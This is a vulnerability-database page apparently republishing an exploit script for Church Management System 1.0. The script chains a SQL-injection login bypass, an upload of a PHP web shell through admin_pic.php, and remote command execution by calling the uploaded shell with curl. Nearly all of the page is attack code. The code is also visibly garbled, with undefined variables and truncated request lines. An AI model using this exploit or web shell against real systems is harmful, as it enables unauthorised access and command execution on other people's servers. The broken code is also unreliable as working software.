Monday, July 12, 2021

Church Management System 1.0 Shell Upload / SQL Injection

# Exploit Title: Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE
# Date: 05-07-2021
# Exploit Author: Eleonora Guardini (eleguardini93 at gmail dot com or eleonora.guardini at dedagroup dot com)
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On: Ubuntu 18.04 with apache2 2.4.29 (Ubuntu)

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random
import os, sys
import argparse
import optparse
import string

if len(sys.argv)!=5:
print('Usage: -u http://<ip> -c <"command">')
print('ex. python3 -c "ls+-la"')

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url")
parser.add_option('-c', '--cmd', action="store", dest="cmd")

print(options.url, options.cmd)

def randomGen(size=8, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))



payload={"username":"test", "password":"' or 'a'='a'#", "login":""};

proxies = { "http": "http://localhost:8080"}

mp_encoder = MultipartEncoder(fields = {
"image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"),

session=requests.Session(), payload, allow_redirects=False) #, proxies=proxies)

headers = {"Cookie": cookie, 'Content-Type':mp_encoder.content_type}

uploadUrl=urlbase+"/admin_pic.php", data=mp_encoder, allow_redirects=False, headers=headers, proxies=proxies)

os.system("curl " + urlbase + "/uploads/" + shellFile + "?cmd="+ options.cmd)


Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated